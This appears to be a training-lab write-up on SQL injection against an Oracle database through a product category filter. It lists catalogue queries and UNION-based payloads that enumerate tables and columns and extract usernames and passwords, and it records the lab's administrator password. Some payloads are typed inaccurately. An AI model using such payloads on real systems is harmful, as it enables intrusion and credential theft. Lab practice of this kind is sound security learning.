## SQL injection attack, listing the database contents on Oracle

- 1. This lab contains a SQL injection vulnerability in the product category filter.
- I need to know the table name that contains users' info and need to know the username and password columns name then retrieve the administrator password to login with it.
- 3. This lab is the same as the previous lab but this lab is for Oracle databases.
- 4. The main difference is how to know the tables and columns name. (Got it from cheat sheet)

```
SELECT * FROM all_tables
SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE'
```

- 5. The payloads:
- Category=Pets' ORDER BY #of columns
- category=Gifts' UNION SELECT table name, NULL FROM all tables--
- category=Gifts' UNION SELECT column\_name, NULL FROM all\_tab\_columns WHERE table\_name ='USERS\_ACSGIR'--
  - category=Gifts' UNION SELECT USERNAME\_ZHQJGX,
     PASSWORD HZBIWF FROM USERS ACSGIR –

The users table name: USERS ACSGIR

The usernames column: USERNAME\_ZHQJGX

The passwords column: PASSWORD HZBIWF

The administrator password is: bl53zkevrv8kzjd8awwa

6. Login successfully.



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